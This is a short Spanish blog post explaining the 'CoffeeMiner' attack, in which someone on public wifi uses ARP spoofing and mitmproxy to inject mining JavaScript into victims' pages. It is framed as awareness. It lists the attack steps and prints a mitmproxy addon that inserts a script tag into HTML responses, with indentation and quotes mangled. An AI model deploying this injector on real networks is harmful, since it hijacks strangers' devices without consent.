Mundo Informatico

Hacker wifi y las victimas generan criptomonedas

0 348

Hacker wifi y las victimas generan criptomonedas

 

Este ataque se llama (Coffeeminer) café minador porque se dio conocer este ataque en tiendas de Starbucks cuando un cliente pidio un cafe y recibió tambien un ataque de MITM.

Como funciona el ataque de café minador:

Los ataques van hacer un ataque de hombre en el medio o más conocido con el abreviado MITM creo que los que tienen algo de conocimiento ya se lo veían venir, después de a ver hackeado la red wifi y hacer el el MITM sigue inyectar código JavaScript a todos los usuarios conectados en la red y así forzarlos a que minen criptomonedas para el atacante.

Explicación del proceso:

Explicare un poco el proceso pero muy por encima ya que la idea no es invitar a que realicen este ataque si no para crear conciencia de que puedes ser victimas de estos ataques en donde hay wifi publico y tambien si no tienes buena seguridad en tu red wifi casera aun que estos ataques se dirigen mas que todos a campos donde haya mucha gente para asi el atacante generar muchos ingresos,aqui algunos pasos que realiza el atacante.

-realizar el ataque ARPspoofing con la biblioteca dsniff.

-utilizar mitmproxy para analizar el tráfico de la red y editar el mismo para hacer la inyección de javascript en las páginas web que visiten las victimas.

-para inyectar el javascript se utilizara API mitmproxy

from bs4 import BeautifulSoup
from mitmproxy import ctx, http
import argparse

class Injector:
def __init__(self, path):
self.path = path

def response(self, flow: http.HTTPFlow) -> None:
if self.path:
html = BeautifulSoup(flow.response.content, «html.parser»)
print(self.path)
print(flow.response.headers[«content-type»])
if flow.response.headers[«content-type»] == ‘text/html’:
script = html.new_tag(
«script»,
src=self.path,
type=’application/javascript’)
html.body.insert(0, script)
flow.response.content = str(html).encode(«utf8»)
print(«Script injected.»)

def start():
parser = argparse.ArgumentParser()
parser.add_argument(«path», type=str)
args = parser.parse_args()
return Injector(args.path)

 

ampliaremos este articulo dependiendo el interés de los usuarios.

Comentarios
Loading...